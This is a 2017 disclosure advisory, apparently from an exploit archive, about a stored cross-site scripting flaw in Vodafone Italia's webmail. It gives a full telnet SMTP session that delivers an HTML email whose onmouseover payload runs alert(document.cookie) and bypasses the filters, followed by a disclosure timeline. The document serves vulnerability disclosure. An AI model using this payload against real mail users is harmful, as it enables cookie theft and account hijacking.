Vodafone Italia Webmail Cross Site Scripting

Vodafone Italia's webmail system suffers from a cross site scripting vulnerability that can be leveraged via an incoming email.


MD5 | d0d7db3a1272f4db6715ac4f88d6f69f

# Title: Vodafone Webmail - Stored Cross-Site Scripting
# Date: 2017-07-14
# Exploit Author: theMiddle / https://github.com/theMiddleBlue
# Website: https://web.mail.vodafone.it


1. Description
the Vodafone Italia webmail (web.mail.vodafone.it) suffers from a
stored cross-site scripting vulnerability. The XSS-Filters can be eluded,
and the vulnerability can be exploited, by sending an e-mail message with
a specific format that will be shown below.

After years of no-answer from Vodafone, I decided to disclose it in order
to alert users and companies that use this webmail.


2. Exploit vulnerability
-------------------------------------------
# telnet mx.vodafone.arubamail.it 25
Trying 62.149.178.10...
Connected to mx.vodafone.arubamail.it.
Escape character is '^]'.
220 mxcmd02.vf.aruba.it bizsmtp ESMTP server ready
HELO example.com
250 mxcmd02.vf.aruba.it hello [*****], pleased to meet you
MAIL FROM: themiddle@protonmail.ch
250 2.1.0 <themiddle@protonmail.ch> sender ok
RCPT TO: *****@vodafone.it
250 2.1.5 <*****@vodafone.it> recipient ok
DATA
354 enter mail, end with "." on a line by itself
Subject: test xss
From: theMiddle <themiddle@protonmail.ch>
To: *****@vodafone.it
Content-Type: text/html; charset=utf-8

<div onmouseover
="alert(document.cookie);"
style
="height:600px;">
test
</div>

.
250 2.0.0 kJLA1v0060an1Af01JLXCz mail accepted for delivery
QUIT
221 2.0.0 mxcmd02.vf.aruba.it bizsmtp closing connection
Connection closed by foreign host.
--------------------------------------------

A screenshot of the executed javascript on Chrome Browser:
http://i.imgur.com/Ap4NK9c.png


3. Timeline
2014-10-31: Initial report to abuse Vodafone e-mail address (no answer received).
2015-06-25: Second contact via social network (no answer received).
2017-07-13: Third e-mail to italy.abuse@mail.vodafone.it (no answer received).
2017-07-14: Disclosure.

Related Posts

Comments